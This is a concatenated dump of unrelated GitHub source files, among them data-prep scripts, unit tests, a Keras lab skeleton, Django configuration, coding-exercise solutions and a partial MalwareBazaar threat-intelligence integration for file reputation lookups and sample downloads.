0c951d03079b7356ec0f67cbf8d87e34b58a4537 | 1edf4c50123a6001b30cff3ad098d566f058ed8f | /utility/dataSplit.py | d7b3bfe61f47b3d43122e90d8c00effdac2fb8d1 | [] | no_license | HaohanWang/geneExpressionRepresentation | be19fa9c89b55063f22614bf6938249275264369 | 5e6881f7e5f3c3a04325437a4894387219e852b8 | refs/heads/master | 2021-01-10T17:44:36.209021 | 2016-05-03T05:44:19 | 2016-05-03T05:44:19 | 50,133,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,246 | py | import numpy as np
# ids = [line.strip() for line in open('../data/ids.txt')]
#
# text = [line.strip() for line in open('../data/ppi_ids.txt')]
#
# ppi = {}
#
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# ppi[(id1, id2)] = 0
#
# count = 0
#
# p = []
# n = []
# np.random.seed(1)
#
# for id1 in ids:
# count += 1
# if count %100==0:
# print id1
# for id2 in ids:
# if (id1, id2) in ppi:
# p.append((id1, id2))
# else:
# if np.random.random() < 0.00017:
# n.append((id1, id2))
#
# print len(n)
# p = p[:12500]
# n = n[:12500]
#
# for i in range(5):
# f1 = open('../data/split/ids_train_'+str(i+1)+'.txt', 'w')
# f2 = open('../data/split/ids_test_'+str(i+1)+'.txt', 'w')
# f1_ = open('../data/split/labels_train_'+str(i+1)+'.txt', 'w')
# f2_ = open('../data/split/labels_test_'+str(i+1)+'.txt', 'w')
#
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f2_.writelines('1\n')
# for k in range(i*2500, (i+1)*2500):
# f2.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f2_.writelines('0\n')
#
# for k in range(0, i*2500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(p[k][0]+'\t'+p[k][1]+'\n')
# f1_.writelines('1\n')
#
# for k in range(0, i*2500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
# for k in range((i+1)*2500, 12500):
# f1.writelines(n[k][0]+'\t'+n[k][1]+'\n')
# f1_.writelines('0\n')
#
# f1.close()
# f2.close()
# f1_.close()
# f2_.close()
ids = [line.strip() for line in open('../data/ids.txt')]
print len(ids)
data = np.loadtxt('../data/ge.csv', delimiter=',')
print data.shape
ge = {}
for i in range(len(ids)):
ge[ids[i]] = data[i,:]
#
# for i in range(5):
# t1l = []
# t1r = []
# t2l = []
# t2r = []
#
# #train
# text = [line.strip() for line in open('../data/split/ids_train_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t1l.append(ge[id1])
# t1r.append(ge[id2])
# np.savetxt('../data/split/data_train_'+str(i+1)+'_a.txt', t1l, delimiter=',')
# np.savetxt('../data/split/data_train_'+str(i+1)+'_b.txt', t1r, delimiter=',')
#
# #test
# text = [line.strip() for line in open('../data/split/ids_test_'+str(i+1)+'.txt')]
# for line in text:
# items = line.split()
# id1 = items[0]
# id2 = items[1]
# t2l.append(ge[id1])
# t2r.append(ge[id2])
# np.savetxt('../data/split/data_test_'+str(i+1)+'_a.txt', t2l, delimiter=',')
# np.savetxt('../data/split/data_test_'+str(i+1)+'_b.txt', t2r, delimiter=',')
text = [line.strip() for line in open('../data/ids_final.txt')]
t1l = []
t1r = []
for line in text:
items = line.split()
id1 = items[0]
id2 = items[1]
t1l.append(ge[id1])
t1r.append(ge[id2])
np.savetxt('../data/split/data_final_a.txt', t1l, delimiter=',')
np.savetxt('../data/split/data_final_b.txt', t1r, delimiter=',')
| [
"[email protected]"
] | |
30665cc9a04c96f8151128447b3694303cff9e74 | 293b7305b86628aa92e23ea10f799b4848661aa5 | /implugin/flashmsg/tests/test_models.py | 6cc1793d411b7303753914717ef8ebcdde503af4 | [] | no_license | socek/impaf-flashmsg | 2ce751c54ff8d9e95f38a691b3579320e3ace546 | 4af4355934f6edf512893f7e9dacfe188179ea62 | refs/heads/master | 2020-04-08T20:58:21.124723 | 2015-08-14T18:05:55 | 2015-08-14T18:05:55 | 38,713,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | from mock import sentinel
from impaf.testing import PyTestCase
from ..models import FlashMessage
class TestFlasMessage(PyTestCase):
_object_cls = FlashMessage
def test_to_dict(self):
obj = self.object(sentinel.message, sentinel.msgtype)
assert obj.to_dict() == {
'message': sentinel.message,
'msgtype': sentinel.msgtype,
}
def test_from_dict(self):
obj = self.object()
obj.from_dict({
'message': sentinel.message,
'msgtype': sentinel.msgtype,
})
assert obj.message == sentinel.message
assert obj.msgtype == sentinel.msgtype
| [
"[email protected]"
] | |
1ce69a1233f5a517348185955b4ec1e46eafffd4 | c7aea375046d194a5bd3c9fda615519f4374b790 | /lab3/text_recognizer/networks/line_lstm_ctc.py | 35205b418d4502e5425aa5d9522fd2821741b094 | [] | no_license | venuraja79/fsdl-text-recognizer-project | 195b16bff453df5acda65181e96f65cb98172b54 | 1b9d20f0de2dd5aa59af490b086f985411c60e20 | refs/heads/master | 2020-06-30T22:09:45.433461 | 2019-08-07T08:53:05 | 2019-08-07T08:53:05 | 200,964,049 | 0 | 1 | null | 2019-08-07T03:20:26 | 2019-08-07T03:20:24 | null | UTF-8 | Python | false | false | 2,406 | py | """LSTM with CTC for handwritten text recognition within a line."""
import tensorflow.keras.backend as K
from tensorflow.python.client import device_lib # pylint: disable=no-name-in-module
from tensorflow.keras.layers import Dense, Input, Reshape, TimeDistributed, Lambda, LSTM, CuDNNLSTM
from tensorflow.keras.models import Model as KerasModel
from text_recognizer.networks.lenet import lenet
from text_recognizer.networks.misc import slide_window
from text_recognizer.networks.ctc import ctc_decode
def line_lstm_ctc(input_shape, output_shape, window_width=28, window_stride=14): # pylint: disable=too-many-locals
image_height, image_width = input_shape
output_length, num_classes = output_shape
num_windows = int((image_width - window_width) / window_stride) + 1
if num_windows < output_length:
raise ValueError(f'Window width/stride need to generate >= {output_length} windows (currently {num_windows})')
image_input = Input(shape=input_shape, name='image')
y_true = Input(shape=(output_length,), name='y_true')
input_length = Input(shape=(1,), name='input_length')
label_length = Input(shape=(1,), name='label_length')
gpu_present = len(device_lib.list_local_devices()) > 2
lstm_fn = CuDNNLSTM if gpu_present else LSTM
# Your code should use slide_window and extract image patches from image_input.
# Pass a convolutional model over each image patch to generate a feature vector per window.
# Pass these features through one or more LSTM layers.
# Convert the lstm outputs to softmax outputs.
# Note that lstms expect a input of shape (num_batch_size, num_timesteps, feature_length).
# Your code below (Lab 3)
# Your code above (Lab 3)
input_length_processed = Lambda(
lambda x, num_windows=None: x * num_windows,
arguments={'num_windows': num_windows}
)(input_length)
ctc_loss_output = Lambda(
lambda x: K.ctc_batch_cost(x[0], x[1], x[2], x[3]),
name='ctc_loss'
)([y_true, softmax_output, input_length_processed, label_length])
ctc_decoded_output = Lambda(
lambda x: ctc_decode(x[0], x[1], output_length),
name='ctc_decoded'
)([softmax_output, input_length_processed])
model = KerasModel(
inputs=[image_input, y_true, input_length, label_length],
outputs=[ctc_loss_output, ctc_decoded_output]
)
return model
| [
"[email protected]"
] | |
f49719da2036ba7ff1dc02db5fb0434c2acd830a | f23a0561ed2e1f5192a2933ba3205bbc84e0172c | /ruidun_system/internet_operate/viewsets/get_monitoring_viewset.py | f7d1a4efbee6c85c9b9e2e159797e78386e57bc5 | [] | no_license | TingxieLi/django-restframework | a179a794760830cedcf60c0069cb7c8d4c7127cd | 3645bc3a396727af208db924c6fdee38abc0f894 | refs/heads/master | 2020-12-05T13:13:29.937243 | 2019-07-18T03:33:23 | 2019-07-18T03:33:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | from rest_framework import viewsets
class GetMonitoringViewSet(viewsets.ReadOnlyModelViewSet):
def retrieve(self, request, *args, **kwargs):
# 获取视频内容,视频应该是实时传输的,这里应该怎么返回数据?
pass
| [
"[email protected]"
] | |
08f94cf25a949eefbaca4cf0a9b2fc8d254be62e | f295b56e9af284092233a724af041a91b35a9f6a | /binary-tree-level-order-traversal/binary-tree-level-order-traversal.py | eb00973a0045f605df9fbf717059748d2f4e83a2 | [] | no_license | saviaga/Coding_E | 7ebdf03b5eca775903ee4b863b56e26190b40029 | dd21bb3b9d8905263416b206877f1a3d9416ee3f | refs/heads/main | 2023-05-02T19:42:07.267054 | 2021-05-21T17:41:52 | 2021-05-21T17:41:52 | 334,220,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
if root is None:
return
queue = collections.deque([root])
ans = []
while queue:
level = []
for _ in range(len(queue)):
current = queue.popleft()
level.append(current.val)
if current.left:
queue.append(current.left)
if current.right:
queue.append(current.right)
ans.append(level)
return ans
| [
"[email protected]"
] | |
4ce02e446ce4895df060625959a73f6d4a1e7ff2 | 1deda52f84b25e52a70dd26afa31c1e40a8391ac | /tools/improved-bertscore-for-image-captioning-evaluation/match_cand_refs.py | e691f1f139291d3f3ce03d32227a38703e6144ae | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jlcsilva/syncap | 7ae7b7974b1c3eeb6507006a325725a67c765c7b | c8191de4e77b6ea9109f124b9f398d9f2c7d7662 | refs/heads/master | 2023-04-10T23:16:39.902339 | 2021-04-23T06:03:24 | 2021-04-23T06:03:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | import json
import argparse
from collections import defaultdict
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--refs_file')
parser.add_argument('--cand_file')
parser.add_argument('--output_fn')
args = parser.parse_args()
# Refs
j = json.load(open(args.refs_file))
anns = j['annotations']
image2anns = defaultdict(list)
for ann in anns:
image2anns[ann['image_id']].append(ann['caption'].strip())
# Cand
j = json.load(open(args.cand_file))
image2cand = defaultdict(list)
for ann in j:
image2cand[ann['image_id']].append(ann['caption'])
samples = {}
for ix, img in enumerate(image2cand):
d = dict()
d['refs'] = image2anns[img] #[:5]
d['cand'] = image2cand[img]
samples[str(ix)] = d
with open(args.output_fn, 'w') as f:
json.dump(samples, f)
| [
"[email protected]"
] | |
79d14202170a7d08135e126bbb7479e3da932f84 | 09f0505f3ac1dccaf301c1e363423f38768cc3cc | /r_DailyProgrammer/Easy/C266/unittests/unittest.py | 07fde993ddb932a70f2021b847e679aadef121e2 | [] | no_license | Awesome-Austin/PythonPractice | 02212292b92814016d062f0fec1c990ebde21fe7 | 9a717f91d41122be6393f9fcd1a648c5e62314b3 | refs/heads/master | 2023-06-21T11:43:59.366064 | 2021-07-29T23:33:00 | 2021-07-29T23:33:00 | 270,854,302 | 0 | 0 | null | 2020-08-11T20:47:10 | 2020-06-08T23:24:09 | Python | UTF-8 | Python | false | false | 259 | py | #! python3
import unittest
from r_DailyProgrammer.Easy.C266.unittests.test_values import TEST_VALUES
class MyTestCase(unittest.TestCase):
def test_something(self):
self.assertEqual(True, False)
if __name__ == '__main__':
unittest.main()
| [
"{ID}+{username}@users.noreply.github.com"
] | {ID}+{username}@users.noreply.github.com |
994ef013a80753d1c06d852b575d1419200b2001 | 631c71f4f4309668dd7a3de9e7eeef944eac2158 | /src/pretix/__init__.py | 9e086b08d5bc3bcda9b85a56c4141cb81d10c768 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | bhaettasch/pretix | 943ee6d8cb48fccd343e2e6fa054c8c4c86f5231 | 5e355b400573783bdd17b1352aefcb36b0efc3f6 | refs/heads/master | 2021-04-18T16:19:48.121409 | 2021-01-05T08:23:00 | 2021-01-05T08:23:00 | 249,561,199 | 0 | 0 | NOASSERTION | 2020-03-23T22:48:21 | 2020-03-23T22:48:20 | null | UTF-8 | Python | false | false | 28 | py | __version__ = "3.15.0.dev0"
| [
"[email protected]"
] | |
7e177a8d82713addc215fa1037b0a74cbfaafb7d | b9be3d951bfab350191092540edc6e353283d621 | /.direnv/python-3.4.3/bin/rst2xml.py | 94a9206c1126cc30a738a855d3950f2aca899539 | [] | no_license | bekkblando/django-social | 7ebd82f66c82ffa6918621e5ee7142bfa5f712d8 | fe47d1babb94170e5403af9ce0f3c672c3045a0d | refs/heads/master | 2020-12-11T01:40:01.429628 | 2015-08-18T14:24:33 | 2015-08-18T14:24:33 | 38,706,690 | 0 | 0 | null | 2015-07-07T18:25:26 | 2015-07-07T18:25:25 | null | UTF-8 | Python | false | false | 668 | py | #!/Users/BekkBlando/Documents/github/djangosocial/.direnv/python-3.4.3/bin/python3.4
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
| [
"[email protected]"
] | |
52aee0fd09b24edae3d34ee70ae4d681a2aa67da | 3291359d8867e7b5ca9e8befb83629810938f903 | /timetable_v3/timetable_v3/urls.py | eb0c1bca0f82d83d2d60c6e88d1f7d126e417997 | [] | no_license | A-miin/timetable_v3 | f9e4610800acb83f3477dcffd2b0ce1c75d2c1d0 | 1de0885f04beec83657672275deff22b71af2de3 | refs/heads/master | 2023-06-09T18:51:44.298534 | 2021-07-02T15:01:54 | 2021-07-02T15:01:54 | 341,462,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,035 | py | """timetable_v3 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
import debug_toolbar
from webapp import urls
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('webapp.urls')),
path('secretariat/', include('secretariat.urls', namespace='secretariat')),
path('api/', include('api.urls', namespace='api')),
path('__debug__/', include(debug_toolbar.urls)),
]
| [
"[email protected]"
] | |
2ad7d7451c252323a7b922b7ce42a3e1f7a03c10 | 1ec29bec73904435980eedc26b3f1e07fafb8784 | /shmakovpn/tests/add_method_to_class/test_add_method_to_class.py | cbf04d3fd1befc3caed91a88242ef0ba4f9491ed | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | shmakovpn/shmakovpn_tools | 4f799c803f4ebdff0e82253ec161d5977e6036cb | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | refs/heads/master | 2023-06-08T17:32:34.591391 | 2021-06-17T05:22:38 | 2021-06-17T05:22:38 | 284,875,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | """
The simple example that explains the impossibility of adding a method to builtin type.
Author: shmakovpn <[email protected]>
Date: 2020-10-01
"""
import unittest
class TestAddMethodToClass(unittest.TestCase):
"""
It is possible to add a method to a class outside of the class
"""
def test_add_method_to_class(self):
class A:
x = 'hello'
a = A()
A.get_x = lambda self: self.x
self.assertEqual(a.get_x(), 'hello')
def test_add_method_to_list(self):
"""
It is impossible to add a method to a built-in type
:return:
"""
try:
list.hello = lambda self: f'hello from list'
some_list = []
self.assertEqual(some_list.hello(), 'hello from list')
except TypeError as e:
pass
except Exception as e:
self.assertTrue(False, msg='An unknown exception was raised instead of the expected TypeError')
else:
self.assertTrue(False, msg='The expected TypeError exception was not raised')
| [
"[email protected]"
] | |
66d3b0de7469b1683d10d96d96d69ab4acea07d3 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Hackerrank/Hackkerrank-Designer PDF Viewer.py | 1c85d2e8aa255eccd12daed1cbc4d104ce1bd3ca | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the designerPdfViewer function below.
def designerPdfViewer(h, word):
# word = nhan
# arr = [1,3,2,1]
arr=[]
for letter in word:
index = ord(letter) - 97
arr.append(h[index])
return max(arr) * len(arr)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
h = list(map(int, input().rstrip().split()))
word = input()
result = designerPdfViewer(h, word)
fptr.write(str(result) + '\n')
fptr.close() | [
"[email protected]"
] | |
07c43020b2c4de524585a2995ba0ad589f42ef70 | 8fd92c0a65c9b3e3912b6e8ef043656ee225880a | /datetime_examples.py | e6023b44234c3f6cfb1b822db2448812f1685d86 | [] | no_license | waiteb15/py3forsci3day | 9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4 | fc664042618f0910d40e85677a2438eef5cce2b7 | refs/heads/master | 2020-04-25T11:24:18.697218 | 2019-02-28T23:40:52 | 2019-02-28T23:40:52 | 172,743,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | #!/usr/bin/env python
from datetime import date, datetime, timedelta, time
today = date.today()
print(today, today.year)
james_bd = date(2014, 8, 1)
print(james_bd)
delta = today - james_bd
print(delta)
years = int(delta.days // 365.25)
print(f"James is {years} years old")
event = datetime(2019, 5, 11, 13, 22, 47)
print(event)
ten_years = timedelta(10 * 365.25)
print(james_bd + ten_years)
import time
start = time.time()
# do something
end = time.time()
seconds = end - start
print("Wait for it....", end="", flush=True)
time.sleep(0)
print("done")
from dateutil.parser import parse
import dateutil.utils
my_dates = [
"Apr 1, 2019",
"2019-04-01",
"4/1/19",
"4-1-2019",
"April 1 2019",
"Feb 31, 2032",
]
for d in my_dates:
try:
print(parse(d))
except Exception as err:
print(err)
d = dateutil.utils.datetime(2019, 4, 1, 11, 11, 11, 0)
print(d, type(d))
| [
"[email protected]"
] | |
10ebe15e221446bab08a4d897fc101f9d8a8b95f | a5aabe2e4057d78e687a57a6b560516a7cdb5836 | /unsserv/common/rpc/protocol.py | 688b39a308b01db7dacf58311fc8aea432c875c7 | [
"MIT"
] | permissive | aratz-lasa/py-unsserv | 0ffc09ddab65a11ce917d0faa8b1b5dff091e563 | 6f332385e55d05953186b9a8b7848bca4b878e18 | refs/heads/master | 2022-12-14T21:10:12.397834 | 2020-05-03T11:29:49 | 2020-05-03T11:29:49 | 228,329,158 | 5 | 0 | MIT | 2022-12-08T07:00:55 | 2019-12-16T07:35:20 | Python | UTF-8 | Python | false | false | 2,808 | py | import asyncio
from abc import ABC, abstractmethod
from dataclasses import is_dataclass, asdict
from enum import IntEnum
from typing import Any, Tuple, Sequence, Dict, Callable
from unsserv.common.rpc.rpc import RPCRegister, RPC
from unsserv.common.rpc.structs import Message
from unsserv.common.structs import Node
Command = IntEnum
Data = Any
Handler = Callable[..., Any]
class ITranscoder(ABC):
my_node: Node
service_id: str
def __init__(self, my_node: Node, service_id: str):
self.my_node = my_node
self.service_id = service_id
@abstractmethod
def encode(self, command: Command, *data: Data) -> Message:
pass
@abstractmethod
def decode(self, message: Message) -> Tuple[Command, Sequence[Data]]:
pass
class AProtocol:
my_node: Node
service_id: str
_rpc: RPC
_transcoder: ITranscoder
_handlers: Dict[Command, Handler]
_running: bool
def __init__(self, my_node: Node):
self.my_node = my_node
self._rpc = RPCRegister.get_rpc(my_node)
self._handlers = {}
self._running = False
async def start(self, service_id: str):
if self._running:
raise RuntimeError("Protocol already running")
self.service_id = service_id
self._transcoder = self._get_new_transcoder()
await self._rpc.register_service(service_id, self.handle_rpc)
self._running = True
async def stop(self):
if self._running:
await self._rpc.unregister_service(self.service_id)
self._running = False
async def handle_rpc(self, message: Message):
command, data = self._transcoder.decode(message)
handler = self._handlers[command]
if asyncio.iscoroutinefunction(handler):
response = await handler(message.node, *data)
return self._encode_response(response)
else:
response = handler(message.node, *data)
return self._encode_response(response)
def _encode_response(self, response: Any) -> Any:
if isinstance(response, list):
return [self._encode_response(response_item) for response_item in response]
elif isinstance(response, tuple):
return tuple(
self._encode_response(response_item) for response_item in response
)
elif hasattr(response, "encode"):
return response.encode()
elif is_dataclass(response):
return asdict(response)
elif isinstance(response, set):
return list(response)
return response
@abstractmethod
def _get_new_transcoder(self):
"""
Method for initializing ITranscoder, because every Protocol implements
its own.
:return:
"""
pass
| [
"[email protected]"
] | |
1fc201d942e296adbcf250786df3f816a80ddebd | e6c65e2e354336a4bea5b6a4ccbccd3682915fe2 | /out-bin/py/google/fhir/seqex/bundle_to_seqex_test.runfiles/com_google_fhir/external/pypi__nose_1_3_7/nose/plugins/testid.py | 3bd121362c001ad4cc26af2877fb5c2b5dc40673 | [
"Apache-2.0"
] | permissive | rasalt/fhir-datalab | c30ab773d84983dd04a37e9d0ddec8bf2824b8a4 | 3e329fc8b4226d3e3a4a7c23c306a86e7a9ea0de | refs/heads/master | 2021-10-09T05:51:04.593416 | 2018-12-21T18:11:03 | 2018-12-22T05:38:32 | 162,744,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/0ddaa3627472ad9d1367a008236ce2f5/external/pypi__nose_1_3_7/nose/plugins/testid.py | [
"[email protected]"
] | |
17ae1f4270a5e2ebf48e65265aafc3399ecba836 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /E9FwvGyad5CDbiH4C_14.py | 47f2553b08320fb3dbcb4e7c16ad17e66bc52e21 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py |
def block(lst):
lista = [list(i) for i in list(zip(*lst)) if 2 in i]
q = 0
for i in lista:
q += len(i) - (i.index(2) + 1)
return q
| [
"[email protected]"
] | |
aad3ab1abf6d1299b48f107d036bf3d579323977 | 2a1b8a671aceda6bc446f8ce26400aa84fa444a6 | /Packs/MalwareBazaar/Integrations/MalwareBazaar/MalwareBazaar.py | 99c29c578cf90e95546b390eaa97f99d11e81baa | [
"MIT"
] | permissive | demisto/content | 6d4722d46f0ff0beea2748e9f7de585bf91a78b4 | 890def5a0e0ae8d6eaa538148249ddbc851dbb6b | refs/heads/master | 2023-09-04T00:02:25.618032 | 2023-09-03T21:56:22 | 2023-09-03T21:56:22 | 60,525,392 | 1,023 | 1,921 | MIT | 2023-09-14T20:55:24 | 2016-06-06T12:17:02 | Python | UTF-8 | Python | false | false | 12,931 | py | import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
import copy
import urllib3
QUERIES = {
"tag": "get_taginfo",
"signature": "get_siginfo",
"file_type": "get_file_type",
"clamav": "get_clamavinfo",
"imphash": "get_imphash",
"yara_rule": "get_yarainfo",
"issuer_cn": "get_issuerinfo"
}
EXCEPTIONS_MESSAGES = {
'illegal_sha256_hash': 'Illegal SHA256 hash provided.',
'file_not_found': 'The file was not found or is unknown to MalwareBazaar.',
'hash_not_found': 'The file (hash) you wanted to query is unknown to MalwareBazaar.',
'illegal_hash': 'The hash you provided is not a valid SHA256 hash.',
'user_blacklisted': 'Your API key is blacklisted.',
'no_results': 'Your query yield no results.',
'not_found': 'Tha value you wanted to query is unknown to MalwareBazaar.',
'illegal': 'The text you provided is not valid.'
}
VENDOR_NAME = 'MalwareBazaar'
LIST_HEADERS = ['md5_hash', 'sha256_hash', 'sha1_hash', 'file_name', 'file_type', 'file_size', 'tags', 'first_seen',
'last_seen']
FILE_HEADERS = ['md5_hash', 'sha256_hash', 'sha1_hash', 'file_name', 'file_type', 'file_size', 'tags', 'first_seen',
'last_seen', 'signature', 'ssdeep', 'reporter', 'imphash', 'yara_rules_names']
class Client(BaseClient):
def __init__(self, server_url, verify, proxy, headers, api_key):
self.api_key = api_key
super().__init__(base_url=server_url, verify=verify, proxy=proxy, headers=headers)
def file_request(self, hash):
response = self._http_request('POST',
files={
'query': (None, "get_info"),
'hash': (None, hash)
})
return response
def malwarebazaar_download_sample_request(self, sha256_hash):
response = self._http_request('POST',
files={
'query': (None, "get_file"),
'sha256_hash': (None, sha256_hash)
},
resp_type="response")
return response
def malwarebazaar_comment_add_request(self, sha256_hash, comment):
if self.api_key is None:
raise Exception('API Key is required for this command')
response = self._http_request('POST',
headers={"API-KEY": self.api_key},
files={
'query': (None, "add_comment"),
'sha256_hash': (None, sha256_hash),
'comment': (None, comment)
})
return response
def malwarebazaar_samples_list_request(self, sample_input, value, limit, query):
files = {
'query': (None, query),
sample_input: (None, value),
}
if not sample_input == 'issuer_cn':
files.update({'limit': (None, limit)})
response = self._http_request('POST',
files=files)
return response
def file_process(hash, reliability, raw_response, response_data) -> CommandResults:
"""
creates CommandResults for every file in the list inserted to file_command
Args:
hash:
raw_response:
response_data:
Returns:
CommandResults for the relevant file
"""
dbot_score = Common.DBotScore(
indicator=hash,
indicator_type=DBotScoreType.FILE,
integration_name=VENDOR_NAME,
score=Common.DBotScore.BAD,
reliability=reliability,
malicious_description=response_data.get('comment')
)
signature = response_data.get('signature')
relationship = EntityRelationship(name='indicator-of',
entity_a=hash,
entity_a_type='File',
entity_b=signature,
entity_b_type=FeedIndicatorType.indicator_type_by_server_version(
"STIX Malware"),
source_reliability=reliability,
brand=VENDOR_NAME)
table_name = f'{VENDOR_NAME} File reputation for: {hash}'
humam_readable_data = copy.deepcopy(response_data)
humam_readable_data.update({'yara_rules_names': []})
rules = humam_readable_data.get('yara_rules', [])
rules = rules if rules else []
for rule in rules:
humam_readable_data.get('yara_rules_names').append(rule.get('rule_name'))
md = tableToMarkdown(table_name, t=humam_readable_data, headerTransform=string_to_table_header, removeNull=True,
headers=FILE_HEADERS)
file_object = Common.File(md5=response_data.get('md5_hash'), sha256=response_data.get('sha256_hash'),
sha1=response_data.get('sha1_hash'), size=response_data.get('file_size'),
file_type=response_data.get('file_type'), dbot_score=dbot_score,
relationships=[relationship])
return CommandResults(
outputs_prefix='MalwareBazaar.File',
outputs_key_field='md5_hash',
outputs=response_data,
raw_response=raw_response,
indicator=file_object,
relationships=[relationship],
readable_output=md
)
def check_query_status(response, is_list_command=False, sample_type=None):
"""
checks whether the request to the API returned with the proper result
Args:
sample_type: string, type of sample (tag, signature, etc.)
is_list_command: bool
response: response from API
"""
not_found_error = '_not_found'
illegal_error = 'illegal_'
query_status = response.get("query_status")
if not query_status == "ok" and not query_status == "success":
if is_list_command:
if query_status == sample_type + not_found_error:
raise Exception(EXCEPTIONS_MESSAGES.get('not_found'))
if query_status == sample_type + illegal_error:
raise Exception(EXCEPTIONS_MESSAGES.get('illegal'))
if query_status in EXCEPTIONS_MESSAGES:
raise Exception(EXCEPTIONS_MESSAGES.get(query_status))
else:
raise Exception(query_status)
def file_command(client: Client, args: Dict[str, Any]) -> List[CommandResults]:
"""
Args:
client:
args: file - list of files hash
Returns:
file reputation for the given hashes
"""
reliability = demisto.params().get('integrationReliability', DBotScoreReliability.A)
if DBotScoreReliability.is_valid_type(reliability):
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)
else:
raise Exception("Please provide a valid value for the Source Reliability parameter.")
file_list = argToList(args.get('file'))
command_results: List[CommandResults] = []
for hash in file_list:
raw_response = client.file_request(hash)
if raw_response.get('query_status') == 'hash_not_found':
command_results.append(create_indicator_result_with_dbotscore_unknown(hash, DBotScoreType.FILE, reliability))
else:
check_query_status(raw_response)
response_data = raw_response.get('data')[0]
if file_name := response_data.get('file_name'):
response_data['file_name'] = '' if file_name == 'file' else file_name
command_results.append(file_process(hash, reliability, raw_response, response_data))
return command_results
def malwarebazaar_download_sample_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sha256_hash of file
Returns:
zip file contains the malware sample from MalwareBazaar
"""
sha256_hash = args.get("sha256_hash")
response = client.malwarebazaar_download_sample_request(sha256_hash)
filename = f'{sha256_hash}.zip'
return fileResult(filename, response.content)
def malwarebazaar_comment_add_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sha256_hash of file, comment to add in context of this file
Returns:
query status of the request to MalwareBazaar (success or error)
"""
sha256_hash = args.get("sha256_hash")
comment = args.get("comment")
response = client.malwarebazaar_comment_add_request(sha256_hash, comment)
check_query_status(response)
readable_output = f'Comment added to {sha256_hash} malware sample successfully'
outputs = {
'sha256_hash': sha256_hash,
'comment': comment,
}
return CommandResults(
outputs_prefix='MalwareBazaar.MalwarebazaarCommentAdd',
outputs_key_field='sha256_hash',
outputs=outputs,
readable_output=readable_output,
raw_response=response,
)
def malwarebazaar_samples_list_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sample_type - {clamav, file_type, imphash, signature, tag, yara_rule}
sample_value
limit (optional) - number of results (default 50)
Returns:
query results from API
"""
sample_input = args.get("sample_type") or ''
value = args.get("sample_value")
limit = arg_to_number(args.get("limit")) if "limit" in args else None
page = arg_to_number(args.get("page")) if "page" in args else None
page_size = arg_to_number(args.get("page_size")) if "page_size" in args else None
# # if limit was provided, request limit results from api, else, use pagination (if nothing is used 50 results will
# # be requested as default)
if limit is None:
if page is not None and page_size is not None:
